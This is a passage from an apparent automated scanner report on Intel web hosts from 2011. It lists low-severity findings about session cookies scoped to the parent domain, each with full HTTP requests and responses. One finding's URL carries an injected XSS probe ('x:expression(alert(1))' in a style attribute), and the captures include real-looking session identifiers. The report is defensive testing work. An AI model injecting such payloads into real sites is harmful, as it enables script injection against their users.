s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:03 GMT
Server: Apache
Set-Cookie: JSESSIONID=2ACD8803AAF9142ABE9BBE7400602B75.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=132338 t=1296956883117344
X-JSL: D=132344 t=1296956883117344
Content-Type: text/css
Connection: keep-alive
Content-Length: 84448


/* overrides for elements while customizing a page */
body.jive-body-widget-customizing #jive-body #jive-body-intro,
body.jive-body-widget-customizing #jive-body #jive-breadcrumb,
body.jive-body-wi
...[SNIP]...

11.16. http://newsroom.intel.com/4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=1B1A7CDD00A68C13A37ECE38A66CD9D7.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=131620 t=1296956878654373
X-JSL: D=131626 t=1296956878654373
Content-Type: text/css
Connection: keep-alive
Content-Length: 9250

/* Clearlooks 2 */

/* Reset */
.clearlooks2, .clearlooks2 div, .clearlooks2 span, .clearlooks2 a {vertical-align:baseline; text-align:left; position:absolute; border:0; padding:0; margin:0; backgroun
...[SNIP]...

11.17. http://newsroom.intel.com/community/intel_newsroom/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/intel_newsroom/?iid=ftr+press HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/about/index.htm?iid=gg_about-en_US+intel_aboutintel
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:11:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; Domain=.intel.com; Path=/
Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323031363b; Expires=Mon, 07-Mar-2011 23:11:11 GMT; Path=/
X-JAL: 613
Content-Language: en-US
CacheHit: D=624946 t=1296947469127528
X-JSL: D=624952 t=1296947469127528
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

11.18. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: newsroom.intel.com

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 01:56:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=0F9AA48CBC22DD7A7D0A421E6737E14C.node7IPR; Domain=.intel.com; Path=/
Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/
X-JAL: 17
Content-Language: en-US
CacheHit: D=26624 t=1296957380484009
X-JSL: D=26628 t=1296957380484009
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

11.19. http://newsroom.intel.com/render-widget!execute.jspa

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /render-widget!execute.jspa

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /render-widget!execute.jspa HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Origin: http://newsroom.intel.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947574107; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_sq=intelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA
Content-Length: 65

frameID=15023&size=1&widgetType=3&container=2016&containerType=14

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=6A2D969FD2F865ED814073478F5CD886.node6IPR; Domain=.intel.com; Path=/
X-JAL: 435
Content-Language: en-US
CacheHit: D=437180 t=1296956932677160
X-JSL: D=437186 t=1296956932677160
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


<div class="content-large"></div>
<div class="content-small">

<ul class="jive-sidebar-rssfeed">
<li>
<span>Feb 2, 2011</span>

...[SNIP]...

11.20. http://newsroom.intel.com/theme/white/styles/theme.css

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /theme/white/styles/theme.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /theme/white/styles/theme.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=7359014C358600335C62FA09C3BE0B68.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=130334 t=1296956932271743
X-JSL: D=130341 t=1296956932271743
Content-Type: text/css
Connection: keep-alive
Content-Length: 2317


/* main default header */
#jive-global-header {
background: #dedede url(../images/jive-hdr-bg1.png) repeat-x top;
border-bottom: 1px #e9e9e9 solid;
}
#jive-global-header-texture {
bac
...[SNIP]...

11.21. https://secure-newsroom.intel.com/cs_login

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure-newsroom.intel.com
Path:   /cs_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs_login HTTP/1.1
Host: secure-newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 05 Feb 2011 23:16:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=A4CC37F1E2D36D9C40FE66EF20991E8D.node7IPR; Domain=.intel.com; Path=/
Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-JAL: 0
Location: https://secure-newsroom.intel.com/login.jspa
Content-Length: 0
CacheHit: D=2495 t=1296947795404257
X-JSL: D=2500 t=1296947795404257
Connection: close
Content-Type: text/plain; charset=UTF-8


11.22. http://software.intel.com/en-us/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
Date: Sat, 05 Feb 2011 23:21:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=80d3b7dbc1c511eec9e30e6313957d55; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 77398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<he
...[SNIP]...

11.23. http://software.intel.com/en-us/articles/intel-cloud-builders-overview/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/articles/intel-cloud-builders-overview/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/articles/intel-cloud-builders-overview/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:22:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=9b9329ab03330eb2995d6e0b7cd5ee03; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 44663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.24. http://software.intel.com/en-us/blogs/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b4b0122969a1cad358c7d154e5df9808; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 52451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.25. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/01/31/everyone-has-a-dream/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/01/31/everyone-has-a-dream/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=c6f20ace22b45018ab76495ba5248e67; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 42232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.26. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/01/31/everyone-has-a-dream/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/01/31/everyone-has-a-dream/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:58 GMT
Content-Length: 2468
Connection: close
Set-Cookie: PHPSESSID=102cf9ecae8791b0e6286744c176e520; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:58 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.27. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=5835ba1bbad9f78b6863c69132a212a2; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.28. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:55 GMT
Content-Length: 537
Connection: close
Set-Cookie: PHPSESSID=94087cf7981dbc449a184ad7e31d34d0; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:55 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.29. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=bdd17db69f4af41eb346e39496779504; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.30. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:52 GMT
Content-Length: 1181
Connection: close
